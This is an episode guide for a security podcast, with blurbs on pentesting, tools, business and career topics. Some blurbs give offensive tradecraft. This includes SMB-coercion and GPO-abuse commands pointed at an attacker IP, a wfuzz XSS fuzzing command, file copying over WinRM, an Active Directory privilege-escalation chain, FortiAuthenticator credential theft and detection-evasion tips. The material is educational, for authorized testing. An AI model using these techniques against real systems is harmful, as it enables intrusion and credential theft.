The 7 Minute Security Podcast
What is it?
The 7 Minute Security podcast is a weekly audio podcast (show notes are here) that started with 7-minute episodes – though they’re typically much longer now – and features some of our favorite security topics:
- Penetration testing
- Vulnerability assessments
- Technical security tools/tips/techniques
- Discussions of certifications such as CEH, OSCP and OSWP
- How to create vulnerable virtual machines
- Career advice
- Interviews with cool security people
Where do I get it?
Copy the show’s RSS feed into your favorite podcast player, or use the links below to jump to the podcast’s landing page on popular platforms:
Do you have sponsors and guests on the show?
Sponsors
If you’re in the IT/security space and have a product or service you would like to promote (note: paid sponsorship), contact us and we’ll be happy to discuss with you.
Guests
We get pitched many guests for the show, and will consider folks who have practical, actionable security topics they want to share with our audience. The goal should be to give all listeners something they can do in their jobs in order to be better offenders and defenders of networks. This episode is a great example. With that in mind, you’re welcome to contact us if you have a guest that you feel is a good fit. Please keep in mind that these interviews are paid opportunities.
Do you have an episode guide?
Indeed we do (note that it may be slightly out of date but you can always use the search box within this site or go directly to the podcast show notes to find what you’re looking for):
Below is a blurb on each podcast episode, as well as a link to the corresponding show notes (if available). I apologize but this gist is often a little outdated, so to view the show notes for the latest episodes be sure to also check out 7MinSec.com/blog.
Published: Friday, January 24, 2025
Today I'm excited about some tools/automation I've been working on to help shore up the 7MinSec security program, including:.
- Using Retype as a document repository
- Leveraging the Nessus API to automate the downloading/correlating of scan data
- Monitoring markdown files for "last update" changes using a basic Python script
View this episode's show notes for more information
Published: Friday, January 17, 2025
Hey friends, today we cover:.
- The shiny new 7MinSec Club
- BPATTY updates
- A talk-through of the WPA3 downgrade attack, complemented by the YouTube livestream
View this episode's show notes for more information
Published: Friday, January 10, 2025
Hello friends! Today we're talking about a neat and quick-to-setup documentation service called Retype . In a nutshell, you can get Retype installed on GitHub pages in about 5 minutes and be writing beautiful markdown pages (with built-in search) immediately. I still...
View this episode's show notes for more information
Published: Friday, January 03, 2025
Happy new year friends! Today we talk about business/personal resolutions, including:.
- New year's resolution on the 7MinSec biz side to have a better work/life balance
- New training offering in the works
- Considering Substack as a communications platform
- A mental health booster that I came across mostly by accident
View this episode's show notes for more information
Published: Monday, December 30, 2024
Today we're doing a milkshake of several topics: wireless pentest pwnage, automating the boring pentest stuff with cursor.ai , and some closing business thoughts at 7MinSec celebrates its 7th year as a security consultancy. Links discussed today:.
- AWUS036ACH wifi card (not my favorite anymore)
- Panda PAU09 N600 (love this one!)
- The very important Github issue that helped me better understand BPFs and WPA3 attacks
- TrustedSec article on WPA3 downgrade attacks
View this episode's show notes for more information
Published: Friday, December 13, 2024
Today we've got some super cool stuff to cover today! First up, BPATTY v1.4 is out and has a slug of cool things: The cocoa-flavored cherry on top is a tale of pentest pwnage that includes:.
- A whole new section on old-school wifi tools like airmon-ng, aireplay-ng and airodump-ng
- Syntax on using two different tools to parse creds from Dehashed
- An updated tutorial on using Gophish for phishing campaigns
- Abusing SCCM
- Finding gold in SQL configuration/security audits
View this episode's show notes for more information
Published: Friday, December 06, 2024
Hey friends, today we're talking about tips to effectively present your technical assessment to a variety of audiences - from lovely IT and security nerds to C-levels, the board and beyond!
View this episode's show notes for more information
Published: Monday, December 02, 2024
Today's episode talks about some things that helped me get through a stressful and hospital-visit-filled Thanksgiving week, including:.
- Journaling
- Meditation
- (An activity I'm ashamed of but has actually done wonders for my mental health)
View this episode's show notes for more information
Published: Friday, November 22, 2024
Hey friends, we've got a short but sweet tale of pentest pwnage for you today. Key lessons learned:.
- Definitely consider BallisKit for your EDR-evasion needs
- If you get local admin to a box, enumerate, enumerate, enumerate! There might be a delicious task or service set to run as a domain admin that can quickly escalate your privileges!
View this episode's show notes for more information
Published: Friday, November 15, 2024
Oooooo, giggidy! Today is (once again) my favorite tale of pentest pwnage. I learned about a feature of PowerUpSQL that helped me find a "hidden" SQL account, and that account ended up being the key to the entire pentest! I wonder how many hidden SQL...
View this episode's show notes for more information
Published: Friday, November 08, 2024
Today we take a look at a zero-trust / ditch-your-VPN solution called Twingate (not a sponsor but we'd like them to be)! It also doubles nicely as a primary or backup connection for your DIY pentest dropboxes which we've talked about quite a bit...
View this episode's show notes for more information
Published: Friday, November 01, 2024
Hey friends, today I'm sharing my first (and non-sponsored) impressions of Level.io, a cool tool for managing Windows, Mac and Linux endpoints. It fits a nice little niche in our pentest dropbox deployments, it has an attractive price point and their support is fantastic.
View this episode's show notes for more information
Published: Friday, October 25, 2024
Today we're talkin' business - specifically how to make your report delivery meetings calm, cool and collect (both for you and the client!).
View this episode's show notes for more information
Published: Friday, October 18, 2024
Hey friends, today I'm putting my blue hat on and dipping my toes in incident response by way of playing with Velociraptor , a very cool (and free!) tool to find evil in your environment. Perhaps even better than the price tag, Velociraptor runs as a...
View this episode's show notes for more information
Published: Monday, October 14, 2024
Today I do a short travelogue about my trip to Washington, geek out about some cool training I did with Velociraptor , ponder drowning myself in blue team knowledge with XINTRA LABS , and share some thoughts about the conference...
View this episode's show notes for more information
Published: Friday, October 04, 2024
Hey! I'm speaking in Wanatchee, Washington next week at the NCESD conference about 7 ways to panic a pentester! Today's tale of pentest pwnage is a great reminder to enumerate, enumerate, enumerate! It also emphases that cracking...
View this episode's show notes for more information
Published: Saturday, September 28, 2024
Today we continue where we left off in episode 641 , but this time talking about how to automatically deploy and install a Ubuntu-based dropbox! I also share some love for...
View this episode's show notes for more information
Published: Monday, September 23, 2024
Ron Cole of Immersive Labs joins us to talk pentest war stories, essential skills he learned while serving on a SOC, and the various pentest training and range platforms you can use to sharpen your security skills! Here are the links Ron shared during our discussion:.
View this episode's show notes for more information
Published: Friday, September 13, 2024
Today we're revisiting the fun world of automating pentest dropboxes using Proxmox, Ansible, Cursor and Level . Plus, a tease about how all this talk about automation is getting us excited for a long-term project: creating a free/community edition...
View this episode's show notes for more information
Published: Saturday, September 07, 2024
This was my favorite pentest tale of pwnage to date! There's a lot to cover in this episode so I'm going to try and bullet out the TLDR version here:.
- Sprinkled farmer files around the environment
- Found high-priv boxes with WebClient enabled
- Added "ghost" machine to the Active Directory (we'll call it GHOSTY)
- RBCD attack to be able to impersonate a domain admin using the CIFS/SMB service against the victim system where some higher-priv users were sitting
- Use net.py to add myself to local admin on the victim host
- Find a vulnerable service to hijack and have run an evil, TGT-gathering Rubeus.exe - found that Credential Guard was cramping my style!
- Pulled the TGT from a host not protected with Credential Guard
- Figured out the stolen user's account has some "write" privileges to a domain controller
- Use rbcd.py to delegate from GHOSTY and to the domain controller
- Request a TGT for GHOSTY
- Use getST.py to impersonate CIFS using a domain admin account on the domain controller (important thing here was to specify the DC by its FQDN, not just hostname)
- Final move: use the domain admin ccache file to leverage net.py and add myself to the Active Directory Administrators group
View this episode's show notes for more information
Published: Tuesday, September 03, 2024
Today's tale of pentest pwnage talks about the dark powers of the net.py script from impacket .
View this episode's show notes for more information
Published: Friday, August 23, 2024
Today we're talking pentesting - specifically some mini gems that can help you escalate local/domain/SQL privileges:.
- Check the C: drive! If you get local admin and the system itself looks boring, check root of C - might have some interesting scripts or folders with tools that have creds in them.
- Also look at Look at Get-ScheduledTasks
- Find ids and passwords easily in Snaffler output with this Snaffler cleaner script
- There's a ton of gold to (potentially) be found in SQL servers - check out my notes on using PowerUpSQL to find misconfigs and agent jobs you might able to abuse!
View this episode's show notes for more information
Published: Saturday, August 17, 2024
Hello friends, I'm excited to release BPATTY[RELOADED] into the world at https://bpatty.rocks ! - which stands for Brian's Pentesting and Technical Tips for You! It's a knowledge base of IT and security bits that help me do a better job doing security stuff! Today I do an...
View this episode's show notes for more information
Published: Monday, August 12, 2024
Artificial hype alert! I'm working on a NEW version of BPATTY (Brian's Pentesting and Technical Tips for You), but it is delayed because of a weird domain name hostage negotiation situation. It's weird. But in the meantime I want to talk about the project (which is a pentest documentation library...
View this episode's show notes for more information
Published: Saturday, August 03, 2024
Today we're talking about eating the security dog food - specifically:.
- Satisfying critical security control #1
- Using the Atlassian family of tools to create a ticketing/change control system and wrap it into an asset inventory
- Leveraging Wazuh as a security monitoring system (with eventual plans to leverage its API to feed Atlassian inventory data)
View this episode's show notes for more information
Published: Friday, July 26, 2024
Hi, today's tale of pentest pwnage covers a few wins and one loss: A cool opportunity to drop Farmer "crops" to a domain admin's desktop folder via PowerShell remote session Finding super sensitive data by dumpster-...
View this episode's show notes for more information
Published: Friday, July 19, 2024
Hey friends, we're doing a little departure from our normal topics and focusing on how to create a security knowledgebase (is that one word or two?) using Docusaurus ! It's cool, it's free, it's from Meta and you can get up and going in just a few commands - check out...
- docusaurus.config.js - for setting the site title and key config settings
- sidebars.js - used to create/edit navigation bar menus
- /src/css/custom.css - to style the site
View this episode's show notes for more information
Published: Friday, July 12, 2024
Today's tale of pentest pwnage includes some fun stuff, including: And if you want to hang around until the very end, you can hear me brag about my oldest son who just became an EMT!.
- SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task - like ping -n 1 your.kali.ip.address. When you're ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \your.kali.ip.address\arbitrary-folder. I'm not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s). If you're on a compromised machine, try Get-ScheduledTask -taskname "name" | select * to get information about what context the attack is running under. DonPAPI got an upgrade recently with a focus on evasion! When attacking vCenter (see our past YouTube stream for a walkthrough), make sure you've got the vmss2core utility, which I couldn't find anywhere except the Internet Archive . Then I really like to follow this article to pull passwords from VM memory dumps. Can't RDP into a victim system that you're PSRemote'd into? Maybe RDP is listening on an alternate port! Try Get-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp | select-object portnumber`
- SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task - like ping -n 1 your.kali.ip.address. When you're ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \your.kali.ip.address\arbitrary-folder.
- I'm not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s). If you're on a compromised machine, try Get-ScheduledTask -taskname "name" | select * to get information about what context the attack is running under.
- DonPAPI got an upgrade recently with a focus on evasion!
- When attacking vCenter (see our past YouTube stream for a walkthrough), make sure you've got the vmss2core utility, which I couldn't find anywhere except the Internet Archive . Then I really like to follow this article to pull passwords from VM memory dumps.
- Can't RDP into a victim system that you're PSRemote'd into? Maybe RDP is listening on an alternate port! Try Get-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp | select-object portnumber`
View this episode's show notes for more information
Published: Sunday, July 07, 2024
Hi friends, today's a tale full of test tips and tools to help you in your adventures in pentesting!.
- SCCM Exploitation SCCM Exploitation: The First Cred Is the Deepest II w/ Gabriel Prud'homme - fantastic resource for learning all about attacking SCCM - starting from a perspective of zero creds
- CMLoot - find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares
- Snaffler - finds all the interesting SMB shares and juicy file contents
- Efflanrs - takes the raw Snaffler log and turns it into an interactive Web app!
- RubeusToCcache - a small tool to convert Base64-encoded .kirbi tickets from Rubeus into .ccache files for Impacket
View this episode's show notes for more information
Published: Monday, July 01, 2024
Today I recap a two week personal/biz road trip and talk about the security stuff that got sprinkled into it, including:.
- Family members who don't care about their personal security
- Weakpass - a cool collection of word lists for brute-forcing and spraying that I'd never heard of
- Working on two security Webinars for Netwrix (here's part 1: Mastering Password Security & Active Directory Monitoring , and and part 2: Advanced Strategies for SQL Server Protection & Sensitive Information Security )
- The moment we though our credit card was stolen at a waterpark
- A shameless plug for our fun interview with Stu the recruiter
- Some internal pentest tips that have given us some gold in recent assessments
- Super fast, spoiler-free movie reviews of Roadhouse , Arcadian , Late Night with the Devil and The Coffee Table
View this episode's show notes for more information
Published: Monday, June 24, 2024
Today we have a fun featured interview with my new friend Stu Musil of Ambient Consulting I had a great time talking with Stu about bashing come common misconceptions people have about working with recruiters, plus tackling some frequently asked questions:.
- How do you properly vet a recruiter you don't know, but who offers a job opportunity you're interested in?
- What questions should you ask a potential recruiter to get a feel for their level of experience in the industry (hint, if a recruiter doesn't even have a LinkedIn page, that's probably a red flag)
- Resume tips: Finding the right length and tone Tailoring your resume for each individual job Highlighting your strengths Do people still use cover letters when applying to a gig? Is a "hobbies and interests" section still a good idea on a resume (to show them you're not a robot who works 24/7)?
- Finding the right length and tone Tailoring your resume for each individual job Highlighting your strengths Do people still use cover letters when applying to a gig? Is a "hobbies and interests" section still a good idea on a resume (to show them you're not a robot who works 24/7)?
- Finding the right length and tone
- Tailoring your resume for each individual job
- Highlighting your strengths
- Do people still use cover letters when applying to a gig?
- Is a "hobbies and interests" section still a good idea on a resume (to show them you're not a robot who works 24/7)?
- Lets talk about some horror and/or success stories from the world of recruiting!
View this episode's show notes for more information
Published: Friday, June 14, 2024
Hey friends, today we talk about some not-so-glamorous but ever-so-important stuff related to running a cybersecurity consultancy, including:.
- Taking an inventory of all the SaaS stuff your business uses - to keep an eye on spending, know when services are expiring, and track which credit card the services are tied to (so the services don't almost get cancelled like some did with me!)
- Tracking domain names, and setting up your own automated rules to notify you well ahead of time when a domain is expiring (maybe that passion project is never gonna happen...time to let those old domains go :-)
- Making a spreadsheet of all important accounts and checking all the auth methods allowed for each account - to prevent attacks such as SIM-swapping
View this episode's show notes for more information
Published: Monday, June 10, 2024
Hey friends, today we continue our series all about migrating from VMWare to the world Proxmox! Specifically:.
- Getting my first Proxmox-based NUCs out in the field for live engagements!
- Pulling the trigger on two bare-metal Proxmox servers to eventually replace my vCenter environment. OVHCloud made it super easy to to add Proxmox to those bare-metals with a simple wizard. I couldn't figure out how to get a Proxmox VM as the main firewall for the whole Proxmox node, but it turns out it helps to RTFM. When getting a bare-metal OS/hypervisor installed, be careful in that the provider may leave the management ports of that host open to the whole world. In OVH's case, they have a software firewall that can be tuned so that, for example, only you can hit the management ports for the box. Getting VLANs setup is a snap once the virtual hardware stuff is in place.
- OVHCloud made it super easy to to add Proxmox to those bare-metals with a simple wizard.
- I couldn't figure out how to get a Proxmox VM as the main firewall for the whole Proxmox node, but it turns out it helps to RTFM.
- When getting a bare-metal OS/hypervisor installed, be careful in that the provider may leave the management ports of that host open to the whole world. In OVH's case, they have a software firewall that can be tuned so that, for example, only you can hit the management ports for the box.
- Getting VLANs setup is a snap once the virtual hardware stuff is in place.
View this episode's show notes for more information
Published: Friday, May 31, 2024
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 20% discount! Hey friends, today we've got a...
- Burp Suite Enterprise
- Caido - a lightweight alternative to Burp
- wfuzz - Web fuzzer. Using a proxy:wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt --sc 200 "https://somedomain.com/shopping?&qty=%2FUZZ" -p 10.0.7.11:8080
- KNOXSS - for XSS testing - pairs nicely with this wrapper: https://github.com/xnl-h4ck3r/knoxnl
View this episode's show notes for more information
Published: Friday, May 24, 2024
Road trip time! I've been traveling this week doing some fun security projects, and thought all this highway time would be a perfect opportunity to take a dip into the 7MS mail bag! Today's questions include:.
- How do you price internal network penetration tests?
- Have you ever had to deal with a difficult client situation, and how did you resolve it?
- Are you done going after certs? Spoiler: no - I'm interested in doing the XINTRA labs (not sure if it includes a cert)
- Do you provide managed services or just stick with more "one and done" assessment work?
- You said the "smart business people" tell you to form reseller partnerships, otherwise you're leaving money on the table - so why don't you?
- I'm thinking of starting my own cybersecurity consultancy - what type of insurance do I need to protect me in case of a digital "oops?"
View this episode's show notes for more information
Published: Friday, May 17, 2024
Today's tale of pentest pwnage is all about my new favorite attack called SPN-less RBCD. We did a teaser episode last week that actually ended up being a full episode all about the attack, and even step by step...
- Our first first impressions of Burp Enterprise
- Why I have a real hard time believing you have to follow all these steps to install Kali on Proxmox
View this episode's show notes for more information
Published: Friday, May 10, 2024
Today's prelude to a tale of pentest pwnage talks about something called "spnless RBCD" (resource-based constrained delegation). Here are the key steps: Lets use my lab of tangent.town as an example and say that TT-DC02 is where Webdav is enabled. Add a DNS record that points to your testing box...
View this episode's show notes for more information
Published: Sunday, May 05, 2024
Sadly, the Broadcom acquisition of VMWare has hit 7MinSec hard - we love running ESXi on our NUCs, but ESXi free is no longer available. To add insult to injury, our [vCenter lab at...
View this episode's show notes for more information
Published: Friday, April 26, 2024
Today we revisit a series about eating the security dog food - in other words, practicing what we preach as security gurus! Specifically we talk about:.
- We're going to get a third-party assessment on 7MinSec (the business)
- Tips for secure email backup/storage
- Limiting the retention of sensitive data you store in cloud places
View this episode's show notes for more information
Published: Sunday, April 21, 2024
Today we're talking about tips to deal with stress and anxiety:.
- It sounds basic, but take breaks - and take them in a different place (don't just stay in the office and do more screen/doom-scrolling)
- I've never gotten to a place in my workload where I go "Ahhh, all caught up!" so I should stop striving to hit that invisible goal.
- Chiropractic and back massages have done wonders for the tightness in my neck and shoulders
- For me, video games where you punch and kick things relieves stress as well (including a specific game that's definitely not for kids !)
View this episode's show notes for more information
Published: Sunday, April 14, 2024
We did something crazy today and recorded an episode that was 7 minutes long! Today we talk about some things that have helped us out in recent pentests:.
- When using Farmer to create "trap" files that coerce authentication, I've found way better results using Windows Search Connectors (.searchConnector-ms) files
- This matrix of "can I relay this to that" has been super helpful, especially early in engagements
View this episode's show notes for more information
Published: Friday, April 05, 2024
Today's episode is all about writing reports in Sysreptor . It's awesome! Main takeaways:.
- The price is free (they have a paid version as well)!
- You can send findings and artifacts directly to the report server using the reptor Python module
- Warning: Sysreptor only exports to PDF (no Word version option!)
- Sysreptor has helped us write reports faster without sacrificing quality
View this episode's show notes for more information
Published: Friday, March 29, 2024
Hey friends, today we've got a tale of pentest pwnage that covers:.
- Passwords - make sure to look for patterns such as keyboard walks, as well as people who are picking passwords where the month the password changed is part of the password (say that five times fast)!
- Making sure you go after cached credentials
- Attacking SCCM - Misconfiguration Manager is an absolute gem to read, and The First Cred is the Deepest - Part 2 with Gabriel Prud'homme is an absolute gem to see. Also, check out sccmhunter for all your SCCM pwnage needs.
View this episode's show notes for more information
Published: Friday, March 22, 2024
Hey friends, today we have a super fun interview with Andrew Morris of GreyNoise to share. Andrew chatted with us about:.
- Young Andrew's early adventures in hacking his school's infrastructure (note: don't try this at home, kids!)
- Meeting a pentester for the first time, and getting his first pentesting job
- Spinning up a box on the internet, having it get popped instantly, and wondering..."Are all these people trying to hack me?"
- Battling through a pentester's least favorite part of the job: THE REPORT!
- GreyNoise's origin story
- How to build a better honeypot/honeynet
View this episode's show notes for more information
Published: Tuesday, March 19, 2024
Hey friends, sorry I'm so late with this (er, last) week's episode but I'm back! Today is more of a prep for tales of pentest pwnage, but topics covered include:.
- Make sure when you're snafflin ' that you check for encrypted/obfuscated logins and login strings - it might not be too tough to decrypt them!
- On the defensive side, I've found myself getting blocked doing things like SharpHound runs, Snaffler, PowerHuntShares, etc. Look through the readme files for these tools and try cranking down the intensity/threads of these tools and you might fly under the radar.
View this episode's show notes for more information
Published: Friday, March 08, 2024
Today we're talkin' business again - specifically as it relates to:.
- How much fun I had attending and speaking at Netwrix Connect
- Being a sales guy in conference situations without being an annoying sales guy in conference situations
- A recap of the talk I co-presented about high profile breaches and lessons we can learn from them
View this episode's show notes for more information
Published: Friday, March 01, 2024
Today's tale of pentest covers:.
- Farming for credentials (don't forget to understand trusted zones to make this happen properly!)
- Snaffling for juice file shares
- Stealing Kerberos tickets with Rubeus
View this episode's show notes for more information
Published: Sunday, February 25, 2024
Hello friends, we're still deep in the podcast trenches this quarter and wanted to share some nuggets of cool stuff we've been learning along the way:.
- Snaffler - pairs nicely with PowerHuntShares to find juicy tidbits within file/folder shares
- Group3r - helps you find interesting and potentially abusable Group Policy Object configurations
- Farmer - totally awesome toolkit for dropping tricky files on shares that will do things like fire up the Webclient service for any system browsing the share (doesn't require admin rights!) or coaxing a system into authenticating with you via HTTP or SMB
View this episode's show notes for more information
Published: Monday, February 19, 2024
Hey friends, sorry for the late episode but I've been deep in the trenches of pentest adventures. I'll do a more formal tale of pentest pwnage when I come up for air, but for now I wanted to share some tips I've picked up from recent engagements:.
- GraphRunner - awesome PowerShell toolkit for interacting with Microsoft Graph API. From a pentesting perspective, it may help you bridge the "gap" between LAN-side AD and Azure and find some goodies - like files with and XSLX extension containing the word password.
- PowerUpSQL -I typically use this to make SQL servers cough me up a hash via SMB using stored procedures, but I learned this week that I'll deeeefffffinitely use the Invoke-SQLAudit -Verbose functionality going forward.
View this episode's show notes for more information
Published: Friday, February 09, 2024
Hey friends, today we cover a funstrating (that's fun + frustrating) issue we had with our DIY pentest dropboxes. TLDL: label install menu label ^Install Yermaum kernel /install.amd/vmlinuz append net.ifnames=0 preseed/url=https://somewebsite/kali.preseed locale=en_US keymap=us hostname=kali777...
- The preseed file got jacked because I had a bad Kali metapackage in it.
- While I was tinkering around with preseed files, I decided it would be more efficient to have the Kali ISO call that preseed file directly over HTTP (rather than make a new ISO every time I made a preseed change). To accomplish that: Mount the Kali ISO Explore to isolinux > txt.cfg Modify the txt.cfg to include a custom boot option that calls your preseed over HTTP. For example:
- Mount the Kali ISO
- Explore to isolinux > txt.cfg
- Modify the txt.cfg to include a custom boot option that calls your preseed over HTTP. For example:
View this episode's show notes for more information
Published: Friday, February 02, 2024
Hey friends, today is a first impressions episode about Sysreptor , which according to their GitHub page, is a fully customisable, offensive security reporting solution designed for pentesters, red teamers and other security-related people alike. It is...
View this episode's show notes for more information
Published: Friday, January 26, 2024
Hey friends, today our pal Hackernovice joins us for a tool (actually two tools!) release party:.
- EvilFortiAuthenticator - it's like a regular FortiAuthenticator , but evil. This tool allows you to capture the FortiAuthenticator API and subsequently steal the entire device's config, subsequently allowing you to restore the config to a second server and potentially steal cleartext Active Directory creds and SMTP accounts! We talk about BulletsPassView - a tool that originially allowed us to simply unmask the "hidden" API key in the FortiAuthenticator client (this did NOT work in the latest version of FAC). Once you get the API key, check out Fortinet's documentation to do fun things like dump the whole config to a file on disk! After you steal the config and restore it to a fresh FortiAuthenticator, use maintenance mode to reset the admin password. Once you can adjust the restored config to your liking, try using MITMsmtp to capture email server creds in the clear! TCMLobbyBBQ - this tool has nothing to do with security, but helps PC players of the Texas Chain Saw Massacre get into lobbies more efficiently.
- EvilFortiAuthenticator - it's like a regular FortiAuthenticator , but evil. This tool allows you to capture the FortiAuthenticator API and subsequently steal the entire device's config, subsequently allowing you to restore the config to a second server and potentially steal cleartext Active Directory creds and SMTP accounts! We talk about BulletsPassView - a tool that originially allowed us to simply unmask the "hidden" API key in the FortiAuthenticator client (this did NOT work in the latest version of FAC). Once you get the API key, check out Fortinet's documentation to do fun things like dump the whole config to a file on disk! After you steal the config and restore it to a fresh FortiAuthenticator, use maintenance mode to reset the admin password. Once you can adjust the restored config to your liking, try using MITMsmtp to capture email server creds in the clear!
- BulletsPassView - a tool that originially allowed us to simply unmask the "hidden" API key in the FortiAuthenticator client (this did NOT work in the latest version of FAC).
- Once you get the API key, check out Fortinet's documentation to do fun things like dump the whole config to a file on disk!
- After you steal the config and restore it to a fresh FortiAuthenticator, use maintenance mode to reset the admin password.
- Once you can adjust the restored config to your liking, try using MITMsmtp to capture email server creds in the clear!
- TCMLobbyBBQ - this tool has nothing to do with security, but helps PC players of the Texas Chain Saw Massacre get into lobbies more efficiently.
View this episode's show notes for more information
Published: Friday, January 19, 2024
Today we talk about some business-y things like:.
- A pre first impressions opinion on Sysreptor
- Why I'm not worried about AI replacing manual pentesting (yet)
- My struggle with going "full CEO" vs. staying in the weeds and working on hands-on security projects
View this episode's show notes for more information
Published: Friday, January 12, 2024
Today our pals Bjorn Kimminich from OWASP and Paul from Project7 and TheUnstoppables.ai join us as we kick off a series all about hacking the [OWASP Juice Shop](https://owasp.org/www-...
- Found the score board
- Bullied the chatbot
- Fired a DOM XSS
- Located a confidential document
- Gave the Juice Shop a devastating zero stars review
- Fired a DOM XSS which played the OWASP Juice Shop Jingle
View this episode's show notes for more information
Published: Friday, January 05, 2024
Today our friend Amanda Berlin , Lead Incident Detection Engineer at Blumira , joins us to talk about being more mentally healthy in 2024!P.S. - did you miss Amanda's past visits to the program? Then check out episode...
View this episode's show notes for more information
Published: Tuesday, January 02, 2024
Today we tease two upcoming tool releases (shooting for Q1, 2024):Happy new year!.
- TCMLobbyBBQ - a Python script for PC players of The Texas Chain Saw Massacre game to help players get out of lobbies and into live games ASAP! The script uses PyAutoGUI to take screenshots of what part of the game you're in, then make appropriate key presses and mouse clicks to get into lobby queues, then alert you when the game actually starts!
- EvilFortiAuthenticator - this tool will allow you to steal administrator API tokens from FortiAuthenticator which can lead to full compromise of the physical device.
View this episode's show notes for more information
Published: Sunday, December 24, 2023
Today I look at potentially replacing Splashtop and UptimeRobot (check out our episode about it here ) with Tailscale and [Uptime...
View this episode's show notes for more information
Published: Friday, December 15, 2023
Today we're talkin' business! Specifically:.
- How to (gently) say "no" to (some) client projects
- How to (politely) challenge end-of-year deadlines
- An idea I'm kicking around in the lab - where I might do away with UptimeRobot and Splashtop in favor of Tailscale and Uptime Kuma
View this episode's show notes for more information
Published: Monday, December 11, 2023
Today our pal Nate Schmitt (you may remember him from his excellent Dealing with Rejection: A DMARC Discussion Webinar) joins us to talk about breaking up with Active Directory. He covers:.
- Why would you want to consider removing AD from your environment?
- What are common items to plan for?
- What steps should you take to efficiently plan a migration?
- What common challenges or considerations will you face?
View this episode's show notes for more information
Published: Friday, December 01, 2023
Hey friends, today I share my experience working with ChatGPT, Ollama.ai , PentestGPT and privateGPT to help me pentest Active Directory, as well as a machine called [Pilgrimage from...
View this episode's show notes for more information
Published: Saturday, November 25, 2023
Today we talk about our first experience working through the responsible disclosure process after finding vulnerabilities in a security product. We cannot share a whole lot of details as of right now, but wanted to give you some insight into the testing/reporting process thus far, which includes...
View this episode's show notes for more information
Published: Friday, November 17, 2023
Today our good buddy Paul and I keep trying to hack the VulnHub machine based on the movie Billy Madison (see part 1...
- Find Eric's secret SSH back door
- Locate and decrypt a hidden file with Billy's homework
- Build wordlists with cewl
- Save Billy from the evil clutches of Eric Gordon!!!
View this episode's show notes for more information
7MS #597: Let's JAMBOREE (Java-Android-Magisk-Burp-Objection-Root-Emulator-Easy) with Robert McCurdy
Published: Saturday, November 11, 2023
Today we had a blast talking with Robert McCurdy about JAMBOREE (Java-Android-Magisk-Burp-Objection-Root-Emulator-Easy) ! JAMBOREE allows you to quickly spin up a portable Git/Python/Java environment and much...
View this episode's show notes for more information
Published: Sunday, November 05, 2023
After about a year break ( last edition of this series was in October, 2022 , we're back with an updated episode of How to Succeed in Business Without Really Crying. We cover:.
- Why we're not planning on selling the business any time soon
- Fast Google Dorks Scan
- Using ProtonVPN via command line
- Our pre first impressions of a pentesting SaaS tool you've almost definitely heard of
View this episode's show notes for more information
Published: Tuesday, October 31, 2023
Today we're joined by Matt Warner of Blumira (remember him from episodes #551 and #529 and #507...
View this episode's show notes for more information
Published: Monday, October 23, 2023
Today we're talking about how you can use PatchMyPC to keep your home PC and/or pentest dropbox automatically updated with the latest/greatest patches!
View this episode's show notes for more information
Published: Sunday, October 15, 2023
Hey friends, today my Paul and I kept trying to hack the VulnHub machine based on the movie Billy Madison (see part 1...
- Port knocking is awesome using utilities like knock :
- Sending emails via command line is made (fairly) easy with swaks:
- Hyda works good for spraying FTP creds:
- Check out my quick cheat sheet about bettercap (see episode #522 ) for some syntax on extracting WPA handshake data from cap files:
View this episode's show notes for more information
Published: Friday, October 06, 2023
Today we're talking about 7 steps you can take to (hopefully) reclaim a hacked Facebook account. The key steps are:Ask Facebook for help (good luck with that)Put out an SOS on your socialsFlag down the FBICall the cops!Grumble to your attorney generalHave patienceLock it down (once you get the...
View this episode's show notes for more information
Published: Friday, September 29, 2023
Today we talk about an awesome path to internal network pentest pwnage using downgraded authentication from a domain controller, a tool called ntlmv1-multi , and a boatload of cloud-cracking power on the...
View this episode's show notes for more information
Published: Friday, September 22, 2023
Today my Paul and I continued hacking Billy Madison (see part one here ) and learned some interesting things:wfuzz -c -z file,/root/Desktop/wordlist.txt --hc 404...
- You can fuzz a URL with a specific file type using a format like this:
- To rip .cap files apart and make them "pretty" you can use tpick:
- To do port knocking, you can use the knock utility:
View this episode's show notes for more information
Published: Friday, September 15, 2023
In today's tale of pentest pwnage we talk about:$sess = New-PSSession -Computername SERVER-I-HAVE-LOCAL-ADMIN-ACCESS-ON -Credential *...then provide your creds...and then:copy-item c:\superimportantfile.doc -destination c:\my-local-hard-drive\superimportantfile.doc -fromsession...
- The importance of local admin and how access to even one server might mean instant, full control over their backup or virtualization infrastructure
- Copying files via WinRM when copying over SMB is blocked:
- If you come across PowerShell code that crafts a secure string credential, you may able to decrypt the password variable with:
View this episode's show notes for more information
Published: Friday, September 08, 2023
Today Amanda Berlin from Blumira teaches us how to unlock the power of Sysmon so we can gain insight into the good, bad and ugly things happening on our corporate endpoints! Key takeaways:.
- Sysmon turns your windows logging up to 11, and pairs well with a config file like this one or this one .
- Careful if you are are running sysmon on non-SSD drives - the intense number of writes might bring that disk to its knees.
- Just getting started logging all the things with sysmon? Why not pump those logs into a free logging/alerting system like Wazuh ?
- I think it was SolarWinds log collector I was trying to think of while recording the show, not CloudTrail.
View this episode's show notes for more information
Published: Friday, September 01, 2023
Today my pal Paul from Project7 and I hack the heck out of Billy Madison a vulnerable virtual machine that is celebrating its 7th anniversary this month!
View this episode's show notes for more information
Published: Friday, August 25, 2023
Today, sadly, might be the last episode of DIY pentest dropbox tips for a while because I found (well, ChatGPT did actually) the missing link to 100% automate a Kali Linux install! Check episode #449 for more info on...
View this episode's show notes for more information
Published: Friday, August 18, 2023
Hey friends, today I'm super excited to share I found the missing link! Specifically, the missing piece that now allows me to create fully automated Windows 10 installs that serve as virtual pentest jumpboxes. Here are the high points: * When your deployment script is finishing and you need the...
View this episode's show notes for more information
